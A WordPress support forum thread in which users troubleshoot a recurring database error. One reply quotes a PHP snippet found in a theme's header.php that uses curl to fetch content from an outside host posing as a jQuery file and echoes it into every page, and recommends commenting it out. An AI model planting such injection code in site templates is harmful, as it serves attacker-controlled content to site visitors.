Support » Fixing WordPress » Error Message: Couldn't connect to database server.

  • Full error message:

    Couldn’t connect to database server.Couldn’t find database magical_rules.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    I’ve googled about it and apparently many others seem to have the exact same problem. Does anyone know how to resolve this? No, its not with the plugins. No, its not with the 3.3 update.

    I’ve reinstalled the wordpress application twice and although it started out fine, within less than half an hour, the error message surfaced again.

    Thanks to all who have anything to reply!

Viewing 15 replies - 1 through 15 (of 45 total)
  • Check your database credentials with your hosting provider.

    My hosting provider mentioned that it has nothing to do with their side. Could it be the application?

    statscurl must be a database not wp db. Its a hack i think. Its coming with all wordpress 3.3 upgrade.

    I have seen lots of website having same error

    http://irishalien.com/

    Home

    http://hubtan.com

    “statscurl must be a database not wp db. Its a hack i think. Its coming with all wordpress 3.3 upgrade.”

    I’m quite a IT retard. Could You explain that in simplier terms? 😡
    I’m suprised why isn’t any of those sites trying to fix it.

    In the folder containing your selected template, there is a header.php file. Just above </head> there is the following:

    <?php
    
    if(function_exists('curl_init'))
    
    {
    
     $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"; 
    
     $ch = curl_init();  
    
     $timeout = 5;  
    
     curl_setopt($ch,CURLOPT_URL,$url); 
    
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    
     $data = curl_exec($ch);  
    
     curl_close($ch); 
    
     echo "$data";
    
    }
    
    ?>

    That is the source of the:
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    I just commented it out and all was well.

    I resolve this issues this is due to All in One SEO Pack – Pro Version which is not compatible with WordPress 3.3 after disabling this there is no such error msgs.

    i have wp v3.2.1 i’ve not upgraded yet to v3.3 and the error is there … so is not a v3.3 error ….
    any ideeas how i can get rid of it ?
    i’ve disabled all plugins and everithing and the error is still there ….

    Hey! I have this exact problem on an elegant theme. It won’t go away until I change the theme. But I really need to use the one I customized. So? any help please?!

    Wow! This is insane! I’m not doing anything but it gets worse – now I get:

    `You don’t have permission to access /backlinker.php on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache mod_qos/9.69 mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 4llw4d.freefilesblog.com Port 80`

    What’s happening? Really?

    Same problem here stefan. Not good….

    Same problem here stefan. Not good…., please help me to handle that problem

    I think its happening to everyone else who had the initial error. Now it gets worst. Anyone else knows where else to direct our questions at?

    I change the themes that I use (thesis themes) became the standard wordpress themes. error as above was missing. and now the problem, how to improve my thesis themes that no longer error out as above?

    I realised that it could very possibly be due to the themes (i was using elegant theme).

    Will try to contact the theme developers

    I believe that very possibly the only way to rectify the problem is to change the theme entirely. Sigh!

Viewing 15 replies - 1 through 15 (of 45 total)
  • The topic ‘Error Message: Couldn't connect to database server.’ is closed to new replies.